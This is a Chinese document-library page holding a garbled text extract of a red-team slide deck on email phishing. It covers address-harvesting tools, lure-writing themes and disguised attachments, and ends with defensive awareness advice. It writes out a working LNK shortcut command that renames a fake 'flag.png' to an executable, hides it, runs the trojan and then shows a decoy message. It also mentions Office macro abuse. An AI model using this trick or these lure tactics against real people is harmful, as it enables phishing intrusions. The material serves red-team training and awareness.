当前位置:首页 > 报告详情

3vilK4li:攻防实战—邮件钓鱼实践(35页).pdf

上传人: 懒人 编号:82849 2022-07-14 35页 2.72MB

1、3vilK4li斗象科技-高级安全服务工程师网安漏洞研究员攻防钓手常见的邮箱收集工具https:/app.snov.io/domain-searchhttp:/ 顶级域名惹的祸!为什么我的邮件还是被拒收?https:/www.mail- or wps)下载文件文件运行获取主机权限几个重要的文案设计方向公司事务时事热点用户利益诱惑:一封掉钱的邮件!几个重要的文案设计方向公司事务时事热点用户利益核酸检测的福利到底要不要让受害者回邮件呢?增加邮件内容的真实性更加符合现代办公的要求受害者可能提高警惕通知类的邮件操作显得多余几个重要的文案设计方向公司事务时事热点用户利益一封完整却又不完整的邮件!时间魔术

2、容易忽略的几点发件时间惰性心理发件内容合理性暗示性动词企业签名压缩包的秘密(EXE)#includevoid main(int argc,char*argv)printf(%sn,argv0);getchar();压缩包的秘密(LNK)C:WindowsSystem32cmd.exe/c dir C:UsersadminDesktopshowCurrentPath123.txt&pauseLnk 双击“图片”也能上线%windir%system32cmd.exe/c if exist“flag.png”(ren flag.png flag.exe&attrib+s+h flag.exe&sta

3、rt flag.exe&ren flag.exe flag.png)else(msg%username%/time:10 该文件不支持压缩包预览,请解压后查看)Lnk 双击“图片”也能上线压缩包1.png.LnkRenameflag.png(exe)flag.exe隐藏flag.exe执行flag.exe执行木马&上线释放&打开(real)flag.png1.pngLnk提示:不支持压缩包内预览,请解压后查看重命名(png)Office Macro批注也疯狂https:/ 邮件标题 正文措辞 正文签名两戒备:正文链接 邮件附件两个稳妥!操作要稳安装杀毒软件不在非官方站点输入账号密码确认链接来源做好登录辅助认证心态要稳沉着冷静及时上报梳理经过防患未然三个开展定期开展安全意识培训定期印发防钓鱼宣传海报定期开展内部钓鱼实战演练

word格式文档无特别注明外均可编辑修改,预览文件经过压缩,下载原文更清晰!
三个皮匠报告文库所有资源均是客户上传分享,仅供网友学习交流,未经上传用户书面授权,请勿作商用。
小时候
小**

该用户很懒,什么也没介绍

客服
商务合作
小程序
服务号
折叠